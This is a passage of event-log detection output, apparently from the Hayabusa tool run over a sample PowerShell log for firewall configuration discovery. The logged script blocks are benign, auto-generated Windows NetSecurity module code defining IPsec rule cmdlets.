+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } e,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 